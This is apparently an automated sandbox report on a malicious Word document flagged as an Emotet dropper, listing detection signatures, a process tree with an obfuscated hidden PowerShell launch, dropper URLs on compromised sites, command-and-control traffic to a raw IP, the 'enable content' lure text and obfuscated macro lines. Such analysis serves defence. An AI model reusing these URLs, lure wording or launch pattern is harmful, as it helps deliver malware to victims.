Analysis Report pack 2254794.doc

Overview

General Information

Sample Name: pack 2254794.doc
Analysis ID: 336496
MD5: 1e1ec8dd9b25146cc2104be64d6f9bf0
SHA1: d7253cfd0015dbb38c6e2bb602216468d83e4b4a
SHA256: 048e5df452e4ba303faa434c138839e4fdf6e8e5004ced58aa30569573eda17e

Most interesting Screenshot:

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with base64 encoded strings
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Obfuscated command line found
Potential dropper URLs found in powershell memory
PowerShell case anomaly found
Powershell drops PE file
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 944 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • cmd.exe (PID: 2288 cmdline: cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD ... MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • msg.exe (PID: 2616 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)
    • powershell.exe (PID: 2548 cmdline: POwersheLL -w hidden -ENCOD ... MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • rundll32.exe (PID: 2848 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL MD5: DD81D91FF3B0763C392422865C9AC12E)
        • rundll32.exe (PID: 960 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • rundll32.exe (PID: 2836 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vgmfknuplwnwb\hrwkllpxgkmn.qzu',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • rundll32.exe (PID: 2932 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jpacxmsgxplznz\gypawljxnacjh.cvj',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 3068 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Crppsin\fgsajt.gvd',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 2864 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fohbyq\ikksw.jnv',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000B.00000002.2347135822.0000000000231000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000005.00000002.2096095535.0000000000296000.00000004.00000001.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth | 0x1f10:$s1: POwersheLL
00000008.00000002.2102461185.00000000001C0000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000007.00000002.2100426425.0000000000190000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
8.2.rundll32.exe.1e0000.1.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
11.2.rundll32.exe.210000.0.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
9.2.rundll32.exe.170000.0.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
7.2.rundll32.exe.190000.0.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
10.2.rundll32.exe.1c0000.0.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: https://fnjbq.com/wp-includes/rlR/ | Avira URL Cloud: Label: malware
Source: http://wap.zhonglisc.com/wp-includes/QryCB/ | Avira URL Cloud: Label: malware
Source: http://petafilm.com/wp-admin/4m/ | Avira URL Cloud: Label: malware
Source: https://sakhisuhaninarijeevika.com/wp-includes/CvGUjvE/ | Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: petafilm.com | Virustotal: Detection: 6%
Source: http://petafilm.com | Virustotal: Detection: 6%
Multi AV Scanner detection for submitted file
Source: pack 2254794.doc | Virustotal: Detection: 30%
Source: pack 2254794.doc | ReversingLabs: Detection: 32%
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_100011C0 Control_RunDLL,VirtualAlloc,VirtualAlloc,GetModuleHandleExA,VirtualAlloc,GetProcAddress,GetProcAddress,VirtualAlloc,GetProcAddress,LdrFindResource_U,LdrAccessResource,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,VirtualAlloc,_memmove,CryptEncrypt,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_100021F0 CryptStringToBinaryW,CoTaskMemAlloc,CryptStringToBinaryW,StgDeserializePropVariant,CoTaskMemFree,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10002730 StgSerializePropVariant,CryptBinaryToStringW,CoTaskMemAlloc,CryptBinaryToStringW,CoTaskMemFree,CoTaskMemFree,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_002375AE CryptDecodeObjectEx,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_0023109C FindFirstFileW,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: global traffic | DNS query: name: petafilm.com
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 176.53.69.151:80
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 176.53.69.151:80

Networking:

Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmp | String found in memory: http://petafilm.com/wp-admin/4m/
Source: powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmp | String found in memory: http://givingthanksdaily.com/qlE/VeF/
Source: powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmp | String found in memory: http://wap.zhonglisc.com/wp-includes/QryCB/
Source: powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmp | String found in memory: https://fnjbq.com/wp-includes/rlR/
Source: powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmp | String found in memory: https://sakhisuhaninarijeevika.com/wp-includes/CvGUjvE/
Source: powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmp | String found in memory: http://zieflix.teleskopstore.com/cgi-bin/Gt3S/
Source: powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmp | String found in memory: https://somanap.com/wp-admin/P/
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK
  Cache-Control: no-cache, must-revalidate
  Pragma: no-cache
  Content-Type: application/octet-stream
  Expires: Wed, 06 Jan 2021 07:49:24 GMT
  Last-Modified: Wed, 06 Jan 2021 07:49:24 GMT
  Server: Microsoft-IIS/10.0
  Set-Cookie: 5ff56b8489beb=1609919364; expires=Wed, 06-Jan-2021 07:50:24 GMT; Max-Age=60; path=/
  Content-Disposition: attachment; filename="QieaYu0XHj8.dll"
  Content-Transfer-Encoding: binary
  X-Powered-By: ASP.NET
  X-Powered-By-Plesk: PleskWin
  Date: Wed, 06 Jan 2021 07:49:23 GMT
  Content-Length: 192000
  Data Ascii: MZ@
Source: global traffic | HTTP traffic detected: GET /wp-admin/4m/ HTTP/1.1
  Host: petafilm.com
  Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 176.53.69.151 176.53.69.151
Source: Joe Sandbox View | IP Address: 5.2.136.90 5.2.136.90
Source: Joe Sandbox View | ASN Name: RADORETR RADORETR
Source: Joe Sandbox View | ASN Name: RCS-RDS73-75DrStaicoviciRO RCS-RDS73-75DrStaicoviciRO
Source: global traffic | HTTP traffic detected: POST /76cxdz6xxj/u15u3hf6xq6us/0vtcgy/tltp48/51u1dif1fy5wlgpgf/ HTTP/1.1
  DNT: 0
  Referer: 5.2.136.90/76cxdz6xxj/u15u3hf6xq6us/0vtcgy/tltp48/51u1dif1fy5wlgpgf/
  Content-Type: multipart/form-data; boundary=--------------sArhAY1ugWdoQV
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: 5.2.136.90
  Content-Length: 5940
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: unknown | TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown | TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown | TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown | TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown | TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown | TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown | TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown | TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown | TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_0024023A InternetReadFile,
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F52C8AA2-B174-499E-B3BD-E7523F18DF93}.tmp
Source: global traffic | HTTP traffic detected: GET /wp-admin/4m/ HTTP/1.1
  Host: petafilm.com
  Connection: Keep-Alive
Source: rundll32.exe, 00000006.00000002.2107691837.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101604260.0000000001E50000.00000002.00000001.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown | DNS traffic detected: queries for: petafilm.com
Source: unknown | HTTP traffic detected: POST /76cxdz6xxj/u15u3hf6xq6us/0vtcgy/tltp48/51u1dif1fy5wlgpgf/ HTTP/1.1
  DNT: 0
  Referer: 5.2.136.90/76cxdz6xxj/u15u3hf6xq6us/0vtcgy/tltp48/51u1dif1fy5wlgpgf/
  Content-Type: multipart/form-data; boundary=--------------sArhAY1ugWdoQV
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: 5.2.136.90
  Content-Length: 5940
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmp | String found in binary or memory: http://givingthanksdaily.com/qlE/VeF/
Source: rundll32.exe, 00000006.00000002.2107691837.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101604260.0000000001E50000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2107691837.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101604260.0000000001E50000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000006.00000002.2108503830.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102634716.0000000002037000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2105249606.0000000002037000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2108503830.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102634716.0000000002037000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2105249606.0000000002037000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2106127906.0000000003B33000.00000004.00000001.sdmp | String found in binary or memory: http://petafilm.com
Source: powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmp | String found in binary or memory: http://petafilm.com/wp-admin/4m/
Source: powershell.exe, 00000005.00000002.2098095500.00000000024D0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2105644253.00000000028E0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2106881102.0000000002890000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000006.00000002.2108503830.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102634716.0000000002037000.00000002.00000001.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmp | String found in binary or memory: http://wap.zhonglisc.com/wp-includes/QryCB/
Source: rundll32.exe, 00000006.00000002.2108503830.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102634716.0000000002037000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2105249606.0000000002037000.00000002.00000001.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2098095500.00000000024D0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2105644253.00000000028E0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2106881102.0000000002890000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000006.00000002.2107691837.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101604260.0000000001E50000.00000002.00000001.sdmp | String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2108503830.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2102634716.0000000002037000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2105249606.0000000002037000.00000002.00000001.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000006.00000002.2107691837.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101604260.0000000001E50000.00000002.00000001.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000005.00000002.2096126054.00000000003C4000.00000004.00000020.sdmp | String found in binary or memory: http://www.piriform.com/cclea;
Source: powershell.exe, 00000005.00000002.2096126054.00000000003C4000.00000004.00000020.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: rundll32.exe, 00000007.00000002.2101604260.0000000001E50000.00000002.00000001.sdmp | String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmp | String found in binary or memory: http://zieflix.teleskopstore.com/cgi-bin/Gt3S/
Source: powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmp | String found in binary or memory: https://fnjbq.com/wp-includes/rlR/
Source: powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmp | String found in binary or memory: https://sakhisuhaninarijeevika.com/wp-includes/CvGUjvE/
Source: powershell.exe, 00000005.00000002.2105049912.0000000003803000.00000004.00000001.sdmp | String found in binary or memory: https://somanap.com/wp-admin/P/

E-Banking Fraud:

Yara detected Emotet
Source: Yara match | File source: 0000000B.00000002.2347135822.0000000000231000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2102461185.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2100426425.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2102499691.00000000001E1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2105453444.0000000000231000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2347096157.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2103478043.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2103529081.0000000000191000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2105397432.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 8.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.rundll32.exe.190000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.rundll32.exe.240000.1.unpack, type: UNPACKEDPE

System Summary:

                    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
                    Source: Screenshot number: 4 | Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words:
                    Source: Screenshot number: 4 | Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
                    Source: Screenshot number: 4 | Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                    Source: Screenshot number: 4 | Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words: 3 N@m 13 ;a 10096 G)
                    Source: Screenshot number: 8 | Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. O a
                    Source: Screenshot number: 8 | Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                    Source: Screenshot number: 8 | Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                    Source: Screenshot number: 8 | Screenshot OCR: ENABLE CONTENT" buttons to preview this document. O a
                    Source: Document image extraction number: 0 | Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                    Source: Document image extraction number: 0 | Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                    Source: Document image extraction number: 0 | Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                    Source: Document image extraction number: 1 | Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                    Source: Document image extraction number: 1 | Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                    Source: Document image extraction number: 1 | Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                    Source: Document image extraction number: 1 | Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                    Document contains an embedded VBA macro with suspicious strings
                    Source: pack 2254794.doc | OLE, VBA macro line: Set VJbwzTDT = ChWZVJiB.CreateTextFile("gMEpHB:\SKWvYCA\YtZqA.fQoAE")
                    Source: pack 2254794.doc | OLE, VBA macro line: Set JhiYfXc = HnBvAEH.CreateTextFile("ehLoAm:\PAVZiAGU\jVPHv.fAgoFBYmC")
                    Source: pack 2254794.doc | OLE, VBA macro line: Set DRrKpoA = xxYeFGUAH.CreateTextFile("eCzvxHN:\cgVnKGAT\YcnDi.YqiJOp")
                    Source: pack 2254794.doc | OLE, VBA macro line: Set AybxtEBCJ = bGMXEIA.CreateTextFile("grPSDMS:\lQkJoR\aZMUgjGC.pVvhaH")
                    Source: pack 2254794.doc | OLE, VBA macro line: Set uJSEDH = dLrgANHCG.CreateTextFile("lBasV:\tFGoGJd\zBuHfBCN.AHGggII")
                    Source: pack 2254794.doc | OLE, VBA macro line: Set tcYiEMeRH = RNgUODjsM.CreateTextFile("FyNFG:\ugXUH\cZIFypIHj.tRULIINC")
                    Source: pack 2254794.doc | OLE, VBA macro line: Set gQxBD = PAxhJ.CreateTextFile("dFVzNBE:\EBCOlEEOJ\KlKcJKk.SVIvoAEqG")
                    Source: pack 2254794.doc | OLE, VBA macro line: Set RkPWCDPC = xkJxAAC.CreateTextFile("tLvao:\aGKUA\AhQhj.BDOQSJWG")
                    Source: pack 2254794.doc | OLE, VBA macro line: Set JADCpjk = rEeiBJ.CreateTextFile("VxskFWpm:\cuyOFYrFJ\SZSlaGJZi.TeBYCDZ")
                    Source: pack 2254794.doc | OLE, VBA macro line: Set eUdbDAHHs = DyjPBI.CreateTextFile("OPLPBI:\fNyAExIq\jrtno.FyobBAAFE")
                    Source: pack 2254794.doc | OLE, VBA macro line: Set njKwJdA = XwZxsHCGt.CreateTextFile("TNJvoD:\walkrfAE\EalrWFWTE.wDSOEJ")
                    Source: pack 2254794.doc | OLE, VBA macro line: Set PmBxcD = rgBSB.CreateTextFile("PkeJHBJJH:\ODJMGCw\NefpJHvCX.XzgyeCQuA")
                    Source: pack 2254794.doc | OLE, VBA macro line: Set oOysMtDG = xCaTC.CreateTextFile("Oafyb:\RPNGMA\cmOgEyD.EEpGjE")
                    Source: pack 2254794.doc | OLE, VBA macro line: Set hiZkEEF = hSbDPCC.CreateTextFile("pygNv:\znIpFIR\yniMs.nmiIGDEDA")
                    Source: pack 2254794.doc | OLE, VBA macro line: Set UPhhYZEF = lEOlGYxK.CreateTextFile("sojcFeJ:\zxDxYHq\rNbtS.PtHuEEP")
                    Source: pack 2254794.doc | OLE, VBA macro line: Set bPFNuJ = VcIiQJFi.CreateTextFile("gNgYGZ:\CatdBMGGg\qGsdAdOQH.cJsxtdJE")
                    Source: pack 2254794.doc | OLE, VBA macro line: Set OBwIBy = QZjuH.CreateTextFile("EEGvGuF:\XrXnHGDDB\noadJZ.yGcKj")
                    Source: pack 2254794.doc | OLE, VBA macro line: Set EUMDPGt = UUoAB.CreateTextFile("XFtOCOULb:\dMKcFHF\GAGPCEp.ZPnnAM")
                    Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set VJbwzTDT = ChWZVJiB.CreateTextFile("gMEpHB:\SKWvYCA\YtZqA.fQoAE")
                    Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set JhiYfXc = HnBvAEH.CreateTextFile("ehLoAm:\PAVZiAGU\jVPHv.fAgoFBYmC")
                    Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set DRrKpoA = xxYeFGUAH.CreateTextFile("eCzvxHN:\cgVnKGAT\YcnDi.YqiJOp")
                    Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set AybxtEBCJ = bGMXEIA.CreateTextFile("grPSDMS:\lQkJoR\aZMUgjGC.pVvhaH")
                    Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set uJSEDH = dLrgANHCG.CreateTextFile("lBasV:\tFGoGJd\zBuHfBCN.AHGggII")
                    Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set tcYiEMeRH = RNgUODjsM.CreateTextFile("FyNFG:\ugXUH\cZIFypIHj.tRULIINC")
                    Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set gQxBD = PAxhJ.CreateTextFile("dFVzNBE:\EBCOlEEOJ\KlKcJKk.SVIvoAEqG")
                    Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set RkPWCDPC = xkJxAAC.CreateTextFile("tLvao:\aGKUA\AhQhj.BDOQSJWG")
                    Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set JADCpjk = rEeiBJ.CreateTextFile("VxskFWpm:\cuyOFYrFJ\SZSlaGJZi.TeBYCDZ")
                    Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set eUdbDAHHs = DyjPBI.CreateTextFile("OPLPBI:\fNyAExIq\jrtno.FyobBAAFE")
                    Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set njKwJdA = XwZxsHCGt.CreateTextFile("TNJvoD:\walkrfAE\EalrWFWTE.wDSOEJ")
                    Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set PmBxcD = rgBSB.CreateTextFile("PkeJHBJJH:\ODJMGCw\NefpJHvCX.XzgyeCQuA")
                    Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Bp63ahh3hb4hyq, String createtextfile: Set oOysMtDG = xCaTC.CreateTextFile("Oafyb:\RPNGMA\cmOgEyD.EEpGjE")
                    Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Bp63ahh3hb4hyq, String createtextfile: Set hiZkEEF = hSbDPCC.CreateTextFile("pygNv:\znIpFIR\yniMs.nmiIGDEDA")
                    Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Bp63ahh3hb4hyq, String createtextfile: Set UPhhYZEF = lEOlGYxK.CreateTextFile("sojcFeJ:\zxDxYHq\rNbtS.PtHuEEP")
                    Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Bp63ahh3hb4hyq, String createtextfile: Set bPFNuJ = VcIiQJFi.CreateTextFile("gNgYGZ:\CatdBMGGg\qGsdAdOQH.cJsxtdJE")
                    Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Y4o_ocvl0jti6oho0r, String createtextfile: Set OBwIBy = QZjuH.CreateTextFile("EEGvGuF:\XrXnHGDDB\noadJZ.yGcKj")
